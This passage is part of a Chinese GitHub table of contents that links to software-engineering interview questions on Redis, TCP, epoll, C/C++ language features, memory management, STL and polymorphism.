Redis的定时机制怎么实现的,有哪些弊端,你将如何改进这个弊端](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#500redis%E7%9A%84%E5%AE%9A%E6%97%B6%E6%9C%BA%E5%88%B6%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%9C%89%E5%93%AA%E4%BA%9B%E5%BC%8A%E7%AB%AF%E4%BD%A0%E5%B0%86%E5%A6%82%E4%BD%95%E6%94%B9%E8%BF%9B%E8%BF%99%E4%B8%AA%E5%BC%8A%E7%AB%AF) ##### [15.3.9 Redis是单线程的,为什么这么高效](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#501redis%E6%98%AF%E5%8D%95%E7%BA%BF%E7%A8%8B%E7%9A%84%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%99%E4%B9%88%E9%AB%98%E6%95%88)) ##### [15.4.1 Redis的数据类型有哪些,底层怎么实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#502redis%E7%9A%84%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E6%9C%89%E5%93%AA%E4%BA%9B%E5%BA%95%E5%B1%82%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0) ##### [15.4.2 Redis和memcached的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#503redis%E5%92%8Cmemcached%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.4.3 TCP的模型,状态转移](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#504tcp%E7%9A%84%E6%A8%A1%E5%9E%8B%E7%8A%B6%E6%80%81%E8%BD%AC%E7%A7%BB) ##### [15.4.4 用过哪些设计模式,单例模式,观察者模式的多线程安全问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#505%E7%94%A8%E8%BF%87%E5%93%AA%E4%BA%9B%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F%E8%A7%82%E5%AF%9F%E8%80%85%E6%A8%A1%E5%BC%8F%E7%9A%84%E5%A4%9A%E7%BA%BF%E7%A8%8B%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98) ##### [15.4.5 用过多线程吗,以前的多线程代码还能怎么优化,线程池的实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#506%E7%94%A8%E8%BF%87%E5%A4%9A%E7%BA%BF%E7%A8%8B%E5%90%97%E4%BB%A5%E5%89%8D%E7%9A%84%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%BB%A3%E7%A0%81%E8%BF%98%E8%83%BD%E6%80%8E%E4%B9%88%E4%BC%98%E5%8C%96%E7%BA%BF%E7%A8%8B%E6%B1%A0%E7%9A%84%E5%AE%9E%E7%8E%B0) ##### [15.4.6 
epoll怎么实现的,reactor模型组成](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#507epoll%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84reactor%E6%A8%A1%E5%9E%8B%E7%BB%84%E6%88%90) ##### [15.4.7 线程间的同步方式,最好说出具体的系统调用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#508%E7%BA%BF%E7%A8%8B%E9%97%B4%E7%9A%84%E5%90%8C%E6%AD%A5%E6%96%B9%E5%BC%8F%E6%9C%80%E5%A5%BD%E8%AF%B4%E5%87%BA%E5%85%B7%E4%BD%93%E7%9A%84%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8) ##### [15.4.8 哈希表的桶个数为什么是质数,合数有何不妥?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#509%E5%93%88%E5%B8%8C%E8%A1%A8%E7%9A%84%E6%A1%B6%E4%B8%AA%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF%E8%B4%A8%E6%95%B0%E5%90%88%E6%95%B0%E6%9C%89%E4%BD%95%E4%B8%8D%E5%A6%A5) ##### [15.4.9 C/C++内存有哪几种类型?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#510cc%E5%86%85%E5%AD%98%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E7%B1%BB%E5%9E%8B) ##### [15.5.1 堆和栈的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#511%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.5.2 堆和自由存储区的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#512%E5%A0%86%E5%92%8C%E8%87%AA%E7%94%B1%E5%AD%98%E5%82%A8%E5%8C%BA%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.5.3 程序编译的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#513%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [15.5.4 计算机内部如何存储负数和浮点数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#514%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%86%85%E9%83%A8%E5%A6%82%E4%BD%95%E5%AD%98%E5%82%A8%E8%B4%9F%E6%95%B0%E5%92%8C%E6%B5%AE%E7%82%B9%E6%95%B0) ##### [15.5.5 函数调用的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#515%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [15.5.6 左值和右值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#516%E5%B7%A6%E5%80%BC%E5%92%8C%E5%8F%B3%E5%80%BC) ##### [15.5.7 什么是内存泄漏?面对内存泄漏和指针越界,你有哪些方法?你通常采用哪些方法来避免和减少这类错误?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#517%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E9%9D%A2%E5%AF%B9%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E5%92%8C%E6%8C%87%E9%92%88%E8%B6%8A%E7%95%8C%E4%BD%A0%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95%E4%BD%A0%E9%80%9A%E5%B8%B8%E9%87%87%E7%94%A8%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95%E6%9D%A5%E9%81%BF%E5%85%8D%E5%92%8C%E5%87%8F%E5%B0%91%E8%BF%99%E7%B1%BB%E9%94%99%E8%AF%AF) ##### [15.5.8 C++11 中有哪些智能指针?shared_ptr 的引用计数是如何实现的?unique_ptr 的unique 是如何实现的?make_shared 和 make_unique 的作用?智能指针使用注意事项?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#518c11-%E4%B8%AD%E6%9C%89%E5%93%AA%E4%BA%9B%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88shared_ptr-%E7%9A%84%E5%BC%95%E7%94%A8%E8%AE%A1%E6%95%B0%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84unique_ptr-%E7%9A%84unique-%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84make_shared-%E5%92%8C-make_unique-%E7%9A%84%E4%BD%9C%E7%94%A8%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E4%BD%BF%E7%94%A8%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9) ##### [15.5.9 C和C++的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#519c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.6.1 int fun() 和 int 
fun(void)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#520int-fun-%E5%92%8C-int-funvoid%E7%9A%84%E5%8C%BA%E5%88%AB)) ##### [15.6.2 const 有什么用途](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#521const-%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94) ##### [15.6.3 在C中用const 能定义真正意义上的常量吗?C++中的const呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#522%E5%9C%A8c%E4%B8%AD%E7%94%A8const-%E8%83%BD%E5%AE%9A%E4%B9%89%E7%9C%9F%E6%AD%A3%E6%84%8F%E4%B9%89%E4%B8%8A%E7%9A%84%E5%B8%B8%E9%87%8F%E5%90%97c%E4%B8%AD%E7%9A%84const%E5%91%A2) ##### [15.6.4 宏和内联(inline)函数的比较?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#523%E5%AE%8F%E5%92%8C%E5%86%85%E8%81%94inline%E5%87%BD%E6%95%B0%E7%9A%84%E6%AF%94%E8%BE%83) ##### [15.6.5 C++中有了malloc / free , 为什么还需要 new / delete?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#524c%E4%B8%AD%E6%9C%89%E4%BA%86malloc--free--%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E9%9C%80%E8%A6%81-new--delete) ##### [15.6.6 C和C++中的强制类型转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#525c%E5%92%8Cc%E4%B8%AD%E7%9A%84%E5%BC%BA%E5%88%B6%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2) ##### [15.6.7 static 有什么用途](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#526static-%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94) ##### [15.6.8 类的静态成员变量和静态成员函数各有哪些特性?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#527%E7%B1%BB%E7%9A%84%E9%9D%99%E6%80%81%E6%88%90%E5%91%98%E5%8F%98%E9%87%8F%E5%92%8C%E9%9D%99%E6%80%81%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E5%90%84%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E6%80%A7) ##### [15.6.9 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#528%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [15.7.1 头文件中的 ifndef/define/endif 是干什么用的? 
该用法和 pragma once 的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#529%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84-ifndefdefineendif-%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8%E7%9A%84-%E8%AF%A5%E7%94%A8%E6%B3%95%E5%92%8C-program-once-%E7%9A%84%E5%8C%BA%E5%88%AB)
##### [15.7.2 当i是一个整数的时候++i和i++哪个更快一点?i++和++i的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#530%E5%BD%93i%E6%98%AF%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%E7%9A%84%E6%97%B6%E5%80%99i%E5%92%8Ci%E9%82%A3%E4%B8%AA%E6%9B%B4%E5%BF%AB%E4%B8%80%E7%82%B9i%E5%92%8Ci%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88)
##### [15.7.3 指针和引用的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#531%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB)
##### [15.7.4 引用占用内存空间吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#532%E5%BC%95%E7%94%A8%E5%8D%A0%E7%94%A8%E5%86%85%E5%AD%98%E7%A9%BA%E9%97%B4%E5%90%97)
##### [15.7.5 三目运算符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#533%E4%B8%89%E7%9B%AE%E8%BF%90%E7%AE%97%E7%AC%A6)
##### [15.7.6 指针数组和数组指针的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#534%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84%E5%92%8C%E6%95%B0%E7%BB%84%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB)
##### [15.7.7 左值引用与右值引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#535%E5%B7%A6%E5%80%BC%E5%BC%95%E7%94%A8%E4%B8%8E%E5%8F%B3%E5%80%BC%E5%BC%95%E7%94%A8)
##### [15.7.8 右值引用的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#536%E5%8F%B3%E5%80%BC%E5%BC%95%E7%94%A8%E7%9A%84%E6%84%8F%E4%B9%89)
##### [15.7.9 什么是面向对象(OOP)?面向对象的意义?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#537%E4%BB%80%E4%B9%88%E6%98%AF%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1oop%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E6%84%8F%E4%B9%89)
##### [15.8.1 解释下封装、继承和多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#538%E8%A7%A3%E9%87%8A%E4%B8%8B%E5%B0%81%E8%A3%85%E7%BB%A7%E6%89%BF%E5%92%8C%E5%A4%9A%E6%80%81)
##### [15.8.2 什么时候生成默认构造函数(无参构造函数)?什么时候生成默认拷贝构造函数?什么是深拷贝?什么是浅拷贝?默认拷贝构造函数是哪种拷贝?什么时候用深拷贝?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#539%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%9F%E6%88%90%E9%BB%98%E8%AE%A4%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%97%A0%E5%8F%82%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%9F%E6%88%90%E9%BB%98%E8%AE%A4%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%BB%80%E4%B9%88%E6%98%AF%E6%B7%B1%E6%8B%B7%E8%B4%9D%E4%BB%80%E4%B9%88%E6%98%AF%E6%B5%85%E6%8B%B7%E8%B4%9D%E9%BB%98%E8%AE%A4%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%98%AF%E5%93%AA%E7%A7%8D%E6%8B%B7%E8%B4%9D%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%A8%E6%B7%B1%E6%8B%B7%E8%B4%9D)
##### [15.8.3 构造函数和析构函数的执行顺序?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#540%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F)
##### [15.8.4 虚析构函数的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#541%E8%99%9A%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8)
##### [15.8.5 
细看拷贝构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#542%E7%BB%86%E7%9C%8B%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [15.8.6 C++的编译环境](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#543c%E7%9A%84%E7%BC%96%E8%AF%91%E7%8E%AF%E5%A2%83) ##### [15.8.7 Most vexing parse](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#544most-vexing-parse) ##### [15.8.8 STL 六大组件](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#545stl-%E5%85%AD%E5%A4%A7%E7%BB%84%E4%BB%B6) ##### [15.8.9 stack 中有 pop() 和 top() 方法,为什么不直接用 pop() 实现弹出和取值的功能?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#546stack-%E4%B8%AD%E6%9C%89-pop-%E5%92%8C-top-%E6%96%B9%E6%B3%95%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E7%9B%B4%E6%8E%A5%E7%94%A8-pop-%E5%AE%9E%E7%8E%B0%E5%BC%B9%E5%87%BA%E5%92%8C%E5%8F%96%E5%80%BC%E7%9A%84%E5%8A%9F%E8%83%BD) ##### [15.9.1 map 和 unordered_map 的区别?各自的优缺点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#547map-%E5%92%8C-unordered_map-%E7%9A%84%E5%8C%BA%E5%88%AB%E5%90%84%E8%87%AA%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [15.9.2 如何初始化一个指针数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#548%E5%A6%82%E4%BD%95%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84) ##### [15.9.3 关键字const是什么含意?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#549%E5%85%B3%E9%94%AE%E5%AD%97const%E6%98%AF%E4%BB%80%E4%B9%88%E5%90%AB%E6%84%8F) ##### [15.9.4 什么是动态特性?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#550%E4%BB%80%E4%B9%88%E6%98%AF%E5%8A%A8%E6%80%81%E7%89%B9%E6%80%A7) ##### [15.9.5 基类的有1个虚函数,子类还需要申明为virtual吗?为什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#551%E5%9F%BA%E7%B1%BB%E7%9A%84%E6%9C%891%E4%B8%AA%E8%99%9A%E5%87%BD%E6%95%B0%E5%AD%90%E7%B1%BB%E8%BF%98%E9%9C%80%E8%A6%81%E7%94%B3%E6%98%8E%E4%B8%BAvirtual%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [15.9.6 在C++ 程序中调用被 C 编译器编译后的函数,为什么要加 extern “C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#552%E5%9C%A8c-%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%AB-c-%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0-extern-c%E5%A3%B0%E6%98%8E) ##### [15.9.7 如何定义Bool变量的TRUE和FALSE的值。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#553%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89bool%E5%8F%98%E9%87%8F%E7%9A%84true%E5%92%8Cfalse%E7%9A%84%E5%80%BC) ##### [15.9.8 内联函数INline和宏定义一起使用的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#554%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0inline%E5%92%8C%E5%AE%8F%E5%AE%9A%E4%B9%89%E4%B8%80%E8%B5%B7%E4%BD%BF%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.9.9 编写my_strcpy函数,实现与库函数strcpy类似的功能,不能使用任何库函数;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#555%E7%BC%96%E5%86%99my_strcpy%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E4%B8%8E%E5%BA%93%E5%87%BD%E6%95%B0strcpy%E7%B1%BB%E4%BC%BC%E7%9A%84%E5%8A%9F%E8%83%BD%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8%E4%BB%BB%E4%BD%95%E5%BA%93%E5%87%BD%E6%95%B0) ##### [16.1.2 
完成程序,实现对数组的降序排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#556%E5%AE%8C%E6%88%90%E7%A8%8B%E5%BA%8F%E5%AE%9E%E7%8E%B0%E5%AF%B9%E6%95%B0%E7%BB%84%E7%9A%84%E9%99%8D%E5%BA%8F%E6%8E%92%E5%BA%8F) ##### [16.1.3 .ICMP是什么协议,处于哪一层?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#557icmp%E6%98%AF%E4%BB%80%E4%B9%88%E5%8D%8F%E8%AE%AE%E5%A4%84%E4%BA%8E%E5%93%AA%E4%B8%80%E5%B1%82) ##### [16.1.4 C中static有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#558c%E4%B8%ADstatic%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [16.1.5 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#559%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C) ##### [16.1.6 C++特点是什么,如何实现多态?画出基类和子类在内存中的相互关系。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#560c%E7%89%B9%E7%82%B9%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E7%94%BB%E5%87%BA%E5%9F%BA%E7%B1%BB%E5%92%8C%E5%AD%90%E7%B1%BB%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E7%9B%B8%E4%BA%92%E5%85%B3%E7%B3%BB) ##### [16.1.7 C++中的什么是多态性? 是如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#561c%E4%B8%AD%E7%9A%84%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%9A%E6%80%81%E6%80%A7-%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [16.1.8 关键字static的作用是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#562%E5%85%B3%E9%94%AE%E5%AD%97static%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.1.9 #define MAX_LEN 500 char arry[MAX_LEN]; cin>>arry; 这段代码有问题吗?若有,请指出并修改;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#563define-max_len-500-char-arrymax_len-cinarry-%E8%BF%99%E6%AE%B5%E4%BB%A3%E7%A0%81%E6%9C%89%E9%97%AE%E9%A2%98%E5%90%97%E8%8B%A5%E6%9C%89%E8%AF%B7%E6%8C%87%E5%87%BA%E5%B9%B6%E4%BF%AE%E6%94%B9) ##### [16.2.1 delete []arry 和 delete arry 一样吗?不一样请说明;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#564delete-arry-%E5%92%8C-delete-arry-%E4%B8%80%E6%A0%B7%E5%90%97%E4%B8%8D%E4%B8%80%E6%A0%B7%E8%AF%B7%E8%AF%B4%E6%98%8E) ##### [16.2.2 多态的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#565%E5%A4%9A%E6%80%81%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [16.2.3 C语言的volatile的含义是什么。使用时会对编译器有什么暗示。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#566c%E8%AF%AD%E8%A8%80%E7%9A%84volatile%E7%9A%84%E5%90%AB%E4%B9%89%E6%98%AF%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8%E6%97%B6%E4%BC%9A%E5%AF%B9%E7%BC%96%E8%AF%91%E5%99%A8%E6%9C%89%E4%BB%80%E4%B9%88%E6%9A%97%E7%A4%BA) ##### [16.2.4 请简述以下两个for循环的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#567%E8%AF%B7%E7%AE%80%E8%BF%B0%E4%BB%A5%E4%B8%8B%E4%B8%A4%E4%B8%AAfor%E5%BE%AA%E7%8E%AF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [16.2.5 预处理器标识#error的目的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#568%E9%A2%84%E5%A4%84%E7%90%86%E5%99%A8%E6%A0%87%E8%AF%86error%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.2.6 
C语言的volatile的含义是什么。使用时会对编译器有什么暗示。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#569c%E8%AF%AD%E8%A8%80%E7%9A%84volatile%E7%9A%84%E5%90%AB%E4%B9%89%E6%98%AF%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8%E6%97%B6%E4%BC%9A%E5%AF%B9%E7%BC%96%E8%AF%91%E5%99%A8%E6%9C%89%E4%BB%80%E4%B9%88%E6%9A%97%E7%A4%BA) ##### [16.2.7 MFC中CString是类型安全类么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#570mfc%E4%B8%ADcstring%E6%98%AF%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E7%B1%BB%E4%B9%88) ##### [16.2.8 内联函数INline和宏定义一起使用的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#571%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0inline%E5%92%8C%E5%AE%8F%E5%AE%9A%E4%B9%89%E4%B8%80%E8%B5%B7%E4%BD%BF%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.2.9 C++中什么数据分配在栈或堆中,New分配数据是在近堆还是远堆中?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#572c%E4%B8%AD%E4%BB%80%E4%B9%88%E6%95%B0%E6%8D%AE%E5%88%86%E9%85%8D%E5%9C%A8%E6%A0%88%E6%88%96%E5%A0%86%E4%B8%ADnew%E5%88%86%E9%85%8D%E6%95%B0%E6%8D%AE%E6%98%AF%E5%9C%A8%E8%BF%91%E5%A0%86%E8%BF%98%E6%98%AF%E8%BF%9C%E5%A0%86%E4%B8%AD) ##### [16.3.1 DB事务处理的四个特性:](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#573db%E4%BA%8B%E5%8A%A1%E5%A4%84%E7%90%86%E7%9A%84%E5%9B%9B%E4%B8%AA%E7%89%B9%E6%80%A7) ##### [16.3.2 如何初始化一个指针数组。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#574%E5%A6%82%E4%BD%95%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84) ##### [16.3.3 int i=(j=4,k=8,l=16,m=32); printf(“%d”, i); 输出是多少?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#575int-ij4k8l16m32-printfd-i-%E8%BE%93%E5%87%BA%E6%98%AF%E5%A4%9A%E5%B0%91) ##### [16.3.4 如何在C中初始化一个字符数组。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#576%E5%A6%82%E4%BD%95%E5%9C%A8c%E4%B8%AD%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E6%95%B0%E7%BB%84) ##### [16.3.5 参数传递有几种方式;实现多态参数传递采用什么方式,如果没有使用某种方式原因是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#577%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E6%9C%89%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E9%87%87%E7%94%A8%E4%BB%80%E4%B9%88%E6%96%B9%E5%BC%8F%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E4%BD%BF%E7%94%A8%E6%9F%90%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%8E%9F%E5%9B%A0%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.3.6 请填写BOOL , float, 指针变量 与“零值”比较的 if 语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#578%E8%AF%B7%E5%A1%AB%E5%86%99bool--float-%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F-%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84-if-%E8%AF%AD%E5%8F%A5) ##### [16.3.7 C++特点是什么,如何实现多态?画出基类和子类在内存中的相互关系。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#579c%E7%89%B9%E7%82%B9%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E7%94%BB%E5%87%BA%E5%9F%BA%E7%B1%BB%E5%92%8C%E5%AD%90%E7%B1%BB%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E7%9B%B8%E4%BA%92%E5%85%B3%E7%B3%BB) ##### [16.3.8 